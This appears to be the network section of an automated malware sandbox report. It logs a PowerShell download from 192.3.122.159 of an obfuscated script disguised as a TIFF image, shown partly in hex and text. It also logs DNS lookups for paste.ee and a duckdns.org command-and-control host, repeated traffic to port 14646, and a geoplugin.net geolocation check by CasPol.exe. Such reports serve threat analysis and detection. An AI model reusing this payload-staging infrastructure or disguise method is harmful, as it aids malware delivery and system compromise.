                                                                                                                  Dec 16, 2024 07:15:38.303633928 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.304450035 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.304577112 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.304621935 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.305522919 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.305578947 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.305625916 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.306518078 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.306632996 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.306679964 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.307574987 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.307697058 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.307744980 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.308587074 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.308702946 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.308752060 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.309612036 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.309741020 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.309782982 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.310709953 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.310810089 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.310858965 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.311743021 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.311863899 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.311918974 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.312722921 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.312835932 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.312885046 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.313746929 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.313872099 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.313919067 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.314774036 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.314896107 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.314944029 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.315850019 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.368673086 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.450814009 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.450979948 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.451122046 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.451297045 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.451397896 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.451437950 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.452330112 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.452435017 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.452475071 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.453315020 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.453504086 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.453547955 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.454323053 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.454433918 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.454476118 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.455341101 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.455454111 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.455507040 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.456366062 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.456469059 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.456511021 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.457437992 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.457534075 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.457570076 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.458405972 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.458515882 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.458554029 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.459403992 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.459508896 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.459554911 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.460414886 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.460527897 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.460571051 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.461472988 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.461606979 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.461652994 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.462532043 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.462611914 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.462662935 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.463486910 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.463584900 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.463632107 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.464512110 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.464626074 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.464674950 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.465533972 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.465650082 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.465696096 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.466526985 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.466658115 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.466708899 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.467564106 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.467708111 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.467757940 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.468575954 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.468692064 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.468740940 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.469614029 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.469832897 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.469881058 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.470611095 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.470733881 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.470773935 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:38.471730947 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.471823931 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:38.471868038 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:39.865159988 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:39.923521042 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.925021887 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:39.985076904 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985104084 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985112906 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985131979 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:39.985141993 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985172987 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:15:39.985244989 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985352993 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985445976 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985454082 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985567093 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:39.985584021 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.044893980 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.105153084 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.105163097 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.105196953 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.105206013 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.105246067 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.105288982 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.105988979 CET1464649759107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:40.106031895 CET4975914646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:16:10.556235075 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:16:10.557291985 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:16:10.677131891 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:16:40.683212996 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:16:40.685108900 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:16:40.805294991 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:17:11.220276117 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:17:11.221657991 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:17:11.341490030 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:17:25.352605104 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:17:25.680493116 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:17:26.336761951 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:17:27.649297953 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:17:30.258615017 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:17:35.461674929 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:17:41.656409025 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:17:41.658828974 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:17:41.778836012 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:17:45.867857933 CET4976080192.168.2.5178.237.33.50
                                                                                                                  Dec 16, 2024 07:18:12.204559088 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:18:12.206267118 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:18:12.326127052 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:18:42.780657053 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  Dec 16, 2024 07:18:42.782016993 CET4975314646192.168.2.5107.173.143.31
                                                                                                                  Dec 16, 2024 07:18:42.901894093 CET1464649753107.173.143.31192.168.2.5
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 16, 2024 07:15:06.756720066 CET6365853192.168.2.51.1.1.1
                                                                                                                  Dec 16, 2024 07:15:29.107215881 CET6105353192.168.2.51.1.1.1
                                                                                                                  Dec 16, 2024 07:15:29.249115944 CET53610531.1.1.1192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:32.863650084 CET6325353192.168.2.51.1.1.1
                                                                                                                  Dec 16, 2024 07:15:33.219526052 CET53632531.1.1.1192.168.2.5
                                                                                                                  Dec 16, 2024 07:15:35.376092911 CET6019053192.168.2.51.1.1.1
                                                                                                                  Dec 16, 2024 07:15:35.514988899 CET53601901.1.1.1192.168.2.5
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 16, 2024 07:15:06.756720066 CET192.168.2.51.1.1.10x2d6fStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 16, 2024 07:15:29.107215881 CET192.168.2.51.1.1.10x9ff6Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                  Dec 16, 2024 07:15:32.863650084 CET192.168.2.51.1.1.10xdc29Standard query (0)kelexrmcadmnnccupdated.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                  Dec 16, 2024 07:15:35.376092911 CET192.168.2.51.1.1.10x9eb6Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 16, 2024 07:15:06.894442081 CET1.1.1.1192.168.2.50x2d6fNo error (0)res.cloudinary.comion.cloudinary.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 16, 2024 07:15:29.249115944 CET1.1.1.1192.168.2.50x9ff6No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                                  Dec 16, 2024 07:15:29.249115944 CET1.1.1.1192.168.2.50x9ff6No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                                  Dec 16, 2024 07:15:33.219526052 CET1.1.1.1192.168.2.50xdc29No error (0)kelexrmcadmnnccupdated.duckdns.org107.173.143.31A (IP address)IN (0x0001)false
                                                                                                                  Dec 16, 2024 07:15:35.514988899 CET1.1.1.1192.168.2.50x9eb6No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                  • paste.ee
                                                                                                                  • 192.3.122.159
                                                                                                                  • geoplugin.net
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549704192.3.122.159806500C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 16, 2024 07:15:00.354363918 CET339OUTGET /47/entiretimeneedgoodthingsforgetbackbestthingswithgoodnewsfor.tIF HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                  Host: 192.3.122.159
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 16, 2024 07:15:01.460316896 CET1236INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 16 Dec 2024 06:15:01 GMT
                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                                  Last-Modified: Fri, 13 Dec 2024 14:19:54 GMT
                                                                                                                  ETag: "259fe-62927865978e6"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Length: 154110
                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: image/tiff
                                                                                                                  Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 6e 00 61 00 4c 00 6b 00 62 00 69 00 47 00 69 00 57 00 69 00 42 00 5a 00 66 00 6b 00 7a 00 20 00 3d 00 20 00 22 00 4b 00 68 00 4c 00 4c 00 5a 00 69 00 78 00 68 00 69 00 69 00 4c 00 66 00 47 00 47 00 41 00 22 00 0d 00 0a 00 69 00 57 00 55 00 54 00 65 00 57 00 57 00 47 00 64 00 51 00 57 00 57 00 4c 00 4c 00 68 00 20 00 3d 00 20 00 22 00 4c 00 73 00 55 00 63 00 6b 00 70 00 62 00 4c 00 4c 00 6d 00 55 00 64 00 70 00 62 00 6e 00 22 00 0d 00 0a 00 63 00 6a 00 47 00 65 00 6f 00 57 00 68 00 4b 00 50 00 55 00 61 00 5a 00 76 00 57 00 69 00 20 00 3d 00 20 00 22 00 57 00 47 00 6f 00 6f 00 4b 00 63 00 57 00 66 00 47 00 57 00 68 00 6e 00 70 00 7a 00 4e 00 22 00 0d 00 0a 00 0d 00 0a 00 6f 00 55 00 63 00 47 00 4b 00 50 00 61 00 61 00 6f 00 47 00 47 00 61 00 4e 00 75 00 4b 00 20 00 3d 00 20 00 22 00 68 00 62 00 7a 00 6b 00 69 00 75 00 5a 00 4c 00 65 00 66 00 62 00 61 00 52 00 7a 00 6b 00 22 00 0d 00 0a 00 7a 00 70 00 54 00 7a 00 47 00 6d 00 5a 00 52 00 78 00 4b 00 [TRUNCATED]
                                                                                                                  Data Ascii: naLkbiGiWiBZfkz = "KhLLZixhiiLfGGA"iWUTeWWGdQWWLLh = "LsUckpbLLmUdpbn"cjGeoWhKPUaZvWi = "WGooKcWfGWhnpzN"oUcGKPaaoGGaNuK = "hbzkiuZLefbaRzk"zpTzGmZRxKKPQdP = "GlLkCmnkGCpBWLW"xLoxizeiUaLlzWC = "GcxKBWikAekmGCo"nRGGKiGAPNUiacf = "pOGiGGTPhWkZTiL"WubGqhPiLKcKqvT = "sAZclsPdhikiWsH"WSWWplWGcGNKgef = "TnIOZLcizfUxRqz"UZNvWpGClzWQlWH = "mLKGNQGhZdLkKWB"ZimiWGKWqieHQaW = "LzWqZzBLUozCQnk"KpcONmhWInmGxtZ = "kLNNpAozmzPpzpq"PGaRuC
                                                                                                                  Dec 16, 2024 07:15:01.460383892 CET1236INData Raw: 00 4b 00 71 00 57 00 6d 00 69 00 6b 00 4c 00 6e 00 4c 00 20 00 3d 00 20 00 22 00 73 00 50 00 4b 00 4c 00 47 00 76 00 55 00 69 00 6c 00 55 00 55 00 4c 00 43 00 6d 00 6d 00 22 00 0d 00 0a 00 57 00 57 00 4a 00 72 00 42 00 47 00 61 00 55 00 4e 00 47
                                                                                                                  Data Ascii: KqWmikLnL = "sPKLGvUilUULCmm"WWJrBGaUNGebeLi = "zfRLLGiaWJLHWpK"WaReWRALofILqUv = "AGonbAbipNZLopm"ZGmzivIvOGxicU
                                                                                                                  Dec 16, 2024 07:15:01.460457087 CET1236INData Raw: 00 57 00 63 00 63 00 57 00 57 00 4f 00 22 00 0d 00 0a 00 6e 00 71 00 6d 00 50 00 4b 00 47 00 5a 00 6f 00 4e 00 78 00 57 00 73 00 7a 00 48 00 57 00 20 00 3d 00 20 00 22 00 47 00 52 00 5a 00 57 00 62 00 68 00 43 00 43 00 71 00 5a 00 63 00 57 00 4b
                                                                                                                  Data Ascii: WccWWO"nqmPKGZoNxWszHW = "GRZWbhCCqZcWKfk"AheWxLfziALbLlU = "HskkviiPituUHLv"mzbPTLlkiLiboHL = "pKWReJRikkkbWWA"u
                                                                                                                  Dec 16, 2024 07:15:01.460473061 CET1236INData Raw: 00 63 00 4c 00 20 00 3d 00 20 00 22 00 4c 00 69 00 78 00 64 00 4c 00 4c 00 4f 00 4b 00 4e 00 67 00 4b 00 65 00 4c 00 4b 00 61 00 22 00 0d 00 0a 00 4b 00 47 00 55 00 55 00 4c 00 4c 00 6d 00 65 00 43 00 75 00 47 00 65 00 4b 00 7a 00 6e 00 20 00 3d
                                                                                                                  Data Ascii: cL = "LixdLLOKNgKeLKa"KGUULLmeCuGeKzn = "WqGGiKbWZoKozzf"GnfZWjWupcWLqiZ = "zZNiPknZAWKbdLK"KKUKfaPqhWiZOfe = "mkqe
                                                                                                                  Dec 16, 2024 07:15:01.460489988 CET1236INData Raw: 00 70 00 68 00 76 00 6b 00 6f 00 6b 00 74 00 41 00 55 00 61 00 71 00 6f 00 54 00 68 00 78 00 20 00 3d 00 20 00 22 00 4c 00 4b 00 73 00 4c 00 66 00 61 00 57 00 7a 00 68 00 74 00 43 00 66 00 61 00 64 00 4c 00 22 00 0d 00 0a 00 43 00 63 00 57 00 6b
                                                                                                                  Data Ascii: phvkoktAUaqoThx = "LKsLfaWzhtCfadL"CcWkLOsflLekhUt = "dOGlzonvHCxbZfW"IOfLWKHWNmkNQei = "niLiLWKBnuRKckR"iursUeNU
                                                                                                                  Dec 16, 2024 07:15:01.460505009 CET1236INData Raw: 00 7a 00 4e 00 4c 00 41 00 5a 00 69 00 57 00 4e 00 57 00 4f 00 61 00 57 00 22 00 0d 00 0a 00 4b 00 41 00 63 00 7a 00 6e 00 7a 00 4b 00 55 00 62 00 69 00 55 00 57 00 6c 00 67 00 6f 00 20 00 3d 00 20 00 22 00 69 00 69 00 55 00 51 00 69 00 5a 00 57
                                                                                                                  Data Ascii: zNLAZiWNWOaW"KAcznzKUbiUWlgo = "iiUQiZWticWNNLJ"ozndLOWbbmLZQhO = "xLgvoCWioCApUae"NAZKBqcLhiKxCzu = "mUZfbhBWTZrxZ
                                                                                                                  Dec 16, 2024 07:15:01.460520029 CET1236INData Raw: 00 63 00 6c 00 74 00 67 00 47 00 68 00 6e 00 64 00 20 00 3d 00 20 00 22 00 65 00 70 00 41 00 69 00 5a 00 57 00 62 00 50 00 74 00 49 00 4c 00 4b 00 75 00 71 00 6b 00 22 00 0d 00 0a 00 6c 00 41 00 55 00 57 00 4b 00 55 00 50 00 6d 00 5a 00 63 00 69
                                                                                                                  Data Ascii: cltgGhnd = "epAiZWbPtILKuqk"lAUWKUPmZciqiLL = "uWipikahAzSkAaU"sdNWRKWuUkeCbUk = "KxGNuGKoLmiBWUN"WteopUJZUpTLiqG =
                                                                                                                  Dec 16, 2024 07:15:01.460527897 CET1236INData Raw: 00 64 00 6b 00 63 00 22 00 0d 00 0a 00 4c 00 62 00 57 00 55 00 47 00 6c 00 55 00 4c 00 6a 00 69 00 4c 00 4b 00 48 00 63 00 4b 00 20 00 3d 00 20 00 22 00 6d 00 75 00 69 00 6f 00 63 00 6e 00 68 00 57 00 6c 00 66 00 4b 00 65 00 73 00 47 00 55 00 22
                                                                                                                  Data Ascii: dkc"LbWUGlULjiLKHcK = "muiocnhWlfKesGU"fZumlIixNCcGLGA = "zjZWlxlhIZrnONo"NKsPlhxKeacUbWe = "mnlpCTIcGoCWLox"ez
                                                                                                                  Dec 16, 2024 07:15:01.460535049 CET1236INData Raw: 00 3d 00 20 00 22 00 72 00 6b 00 57 00 63 00 55 00 74 00 4e 00 69 00 62 00 4b 00 57 00 41 00 65 00 43 00 4c 00 22 00 0d 00 0a 00 42 00 4c 00 71 00 50 00 68 00 49 00 4c 00 55 00 4c 00 53 00 74 00 69 00 68 00 61 00 4b 00 20 00 3d 00 20 00 22 00 6b
                                                                                                                  Data Ascii: = "rkWcUtNibKWAeCL"BLqPhILULStihaK = "kCGmoNWpPCTrLkR"pWWbZRbZTLKmrLK = "PzhjLGpLzWfRcuc"nlUkhnRcnBWPfGL = "cWiNxQO
                                                                                                                  Dec 16, 2024 07:15:01.460566044 CET1236INData Raw: 00 53 00 70 00 7a 00 6d 00 47 00 4c 00 41 00 62 00 57 00 63 00 4c 00 66 00 6b 00 6a 00 20 00 3d 00 20 00 22 00 5a 00 69 00 6e 00 5a 00 69 00 6f 00 4b 00 47 00 65 00 66 00 4c 00 62 00 57 00 75 00 74 00 22 00 0d 00 0a 00 47 00 68 00 6b 00 4c 00 57
                                                                                                                  Data Ascii: SpzmGLAbWcLfkj = "ZinZioKGefLbWut"GhkLWiKKcoNuLLW = "OZLigZCzrWWLKZW"WvifeLKicWKqBNL = "KiKLCicWcZpmrcU"NOkcxLhaUoG
                                                                                                                  Dec 16, 2024 07:15:01.581423044 CET1236INData Raw: 00 6a 00 57 00 41 00 74 00 57 00 6b 00 63 00 62 00 47 00 22 00 0d 00 0a 00 5a 00 68 00 50 00 57 00 73 00 65 00 57 00 6f 00 47 00 78 00 6d 00 73 00 57 00 47 00 7a 00 20 00 3d 00 20 00 22 00 78 00 55 00 51 00 6f 00 5a 00 48 00 57 00 57 00 41 00 68
                                                                                                                  Data Ascii: jWAtWkcbG"ZhPWseWoGxmsWGz = "xUQoZHWWAhjGiRc"LLuiHSfxogaWWbB = "WzPWaKbWmUoKmxf"nilLZabWWKCfGLW = "UWghqPuaxLkWaL


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549760178.237.33.50806220C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 16, 2024 07:15:35.639398098 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                  Host: geoplugin.net
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Dec 16, 2024 07:15:36.888050079 CET1171INHTTP/1.1 200 OK
                                                                                                                  date: Mon, 16 Dec 2024 06:15:36 GMT
                                                                                                                  server: Apache
                                                                                                                  content-length: 963
                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                  cache-control: public, max-age=300
                                                                                                                  access-control-allow-origin: *
